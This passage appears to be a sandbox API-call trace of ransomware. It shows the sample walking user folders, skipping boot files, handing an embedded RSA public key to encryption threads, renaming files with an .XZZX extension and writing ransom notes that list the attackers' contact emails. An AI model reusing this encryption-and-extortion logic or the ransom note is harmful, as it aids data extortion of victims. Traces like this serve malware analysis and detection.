(lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="NTLDR") returned 0x0 [0236.223] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0236.223] StrStrW (lpFirst="7B7BA3C4205941180FE9457124712560.XZZX", lpSrch="ntdetect.com") returned 0x0 [0236.224] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="Desktop") returned 0x0 [0236.224] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="DESKTOP") returned 0x0 [0236.224] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned 63 [0236.224] lstrcpyA (in: lpString1=0x17a7dc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.224] lstrcpyW (in: lpString1=0x17addc, lpString2="7B7BA3C4205941180FE9457124712560.XZZX" | out: lpString1="7B7BA3C4205941180FE9457124712560.XZZX") returned="7B7BA3C4205941180FE9457124712560.XZZX" [0236.224] lstrcpyW (in: lpString1=0x17a9dc, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\" [0236.224] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17a7dc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11e8 [0236.224] Sleep (dwMilliseconds=0x96) [0236.376] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 1 [0236.376] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0236.377] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0236.377] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0236.377] FindNextFileW (in: hFindFile=0x3cdecd8, lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0 [0236.377] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 1 [0236.377] FindClose (in: hFindFile=0x3cdecd8 | out: hFindFile=0x3cdecd8) returned 0 [0236.377] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private" [0236.377] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*" [0236.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="Desktop") returned 0x0 [0236.377] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\", lpSrch="DESKTOP") returned 0x0 [0236.377] SetErrorMode (uMode=0x1) returned 0x1 [0236.377] wsprintfW (in: param_1=0x17a39c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\_HELP_INSTRUCTION.TXT") returned 80 [0236.377] GetUserNameW (in: lpBuffer=0x178178, pcbBuffer=0x177f64 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x177f64) returned 1 [0236.377] wsprintfW (in: param_1=0x177f70, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0236.378] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x177f6c | out: phkResult=0x177f6c*=0x11ec) returned 0x0 [0236.378] RegQueryValueExW (in: hKey=0x11ec, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d4cb8, lpcbData=0x177f68*=0x104 | out: lpType=0x0, lpData=0x43d4cb8*=0x65, lpcbData=0x177f68*=0x4a) returned 0x0 [0236.378] RegCloseKey (hKey=0x11ec) returned 0x0 [0236.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17939c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0236.378] wsprintfW (in: param_1=0x17839c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0236.378] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\_private\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11ec [0236.378] CloseHandle (hObject=0x11ec) returned 1 [0236.378] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*.*", lpFindFileData=0x17b1e0 | out: lpFindFileData=0x17b1e0) returned 0x3cdecd8 [0236.378] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private") returned="_private" [0236.378] lstrcpyW (in: lpString1=0x17a5a4, lpString2="_private" | out: lpString1="_private") returned="_private" [0236.378] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0236.378] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0236.379] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0236.379] SetErrorMode (uMode=0x1) returned 0x1 [0236.379] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0236.379] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0236.379] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\" [0236.379] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0236.379] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0236.379] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0236.379] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos" [0236.379] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*" [0236.379] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="Desktop") returned 0x0 [0236.379] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\", lpSrch="DESKTOP") returned 0x0 [0236.379] SetErrorMode (uMode=0x1) returned 0x1 [0236.379] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT") returned 71 [0236.379] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0236.379] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0236.379] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x11f0) returned 0x0 [0236.380] RegQueryValueExW (in: hKey=0x11f0, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d4ee8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43d4ee8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0236.380] RegCloseKey (hKey=0x11f0) returned 0x0 [0236.380] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0236.380] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0236.380] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11f0 [0236.380] CloseHandle (hObject=0x11f0) returned 1 [0236.380] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0236.380] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0236.380] FindNextFileW (in: hFindFile=0x3cde9d8, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0236.380] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0236.380] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0236.380] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0236.380] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0236.380] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0236.380] SetErrorMode (uMode=0x1) returned 0x1 [0236.380] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0236.380] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0236.381] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0236.381] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*" [0236.381] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0236.381] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="Outlook Files" [0236.381] lstrcpyW (in: lpString1=0x17b644, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0236.381] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0236.381] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="ntldr") returned 0x0 [0236.381] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="NTLDR") returned 0x0 [0236.381] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0236.381] StrStrW (lpFirst="7BA753503E40D4C00F297B124258B908.XZZX", lpSrch="ntdetect.com") returned 0x0 [0236.381] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="Desktop") returned 0x0 [0236.382] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="DESKTOP") returned 0x0 [0236.382] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 58 [0236.382] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0236.382] lstrcpyW (in: lpString1=0x17be7c, lpString2="7BA753503E40D4C00F297B124258B908.XZZX" | out: lpString1="7BA753503E40D4C00F297B124258B908.XZZX") returned="7BA753503E40D4C00F297B124258B908.XZZX" [0236.382] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0236.382] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x11f4 [0236.382] Sleep (dwMilliseconds=0x96) [0236.532] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0236.532] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2="..") returned 1 [0236.532] lstrcmpW (lpString1="_HELP_INSTRUCTION.TXT", lpString2=".") returned 1 [0236.532] StrStrW (lpFirst="_HELP_INSTRUCTION.TXT", lpSrch="_HELP_INSTRUCTION.TXT") returned="_HELP_INSTRUCTION.TXT" [0236.533] FindNextFileW (in: hFindFile=0x3cdec58, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0236.533] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 1 [0236.533] FindClose (in: hFindFile=0x3cdec58 | out: hFindFile=0x3cdec58) returned 0 [0236.533] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0236.533] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*" [0236.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="Desktop") returned 0x0 [0236.533] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="DESKTOP") returned 0x0 [0236.533] SetErrorMode (uMode=0x1) returned 0x1 [0236.533] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\_HELP_INSTRUCTION.TXT") returned 75 [0236.533] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0236.533] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0236.533] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x11f8) returned 0x0 [0236.534] RegQueryValueExW (in: hKey=0x11f8, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x43d5118, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x43d5118*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0236.534] RegCloseKey (hKey=0x11f8) returned 0x0 [0236.534] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0236.534] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0236.534] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x11f8 [0236.534] CloseHandle (hObject=0x11f8) returned 1 [0236.534] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x3cdec58 [0236.534] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="Outlook Files" [0236.534] lstrcpyW (in: lpString1=0x17b644, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0236.534] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0236.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0236.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0236.534] SetErrorMode (uMode=0x1) returned 0x1 [0236.534] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0236.534] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0236.535] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0236.535] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0236.535] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x17d320 | out: 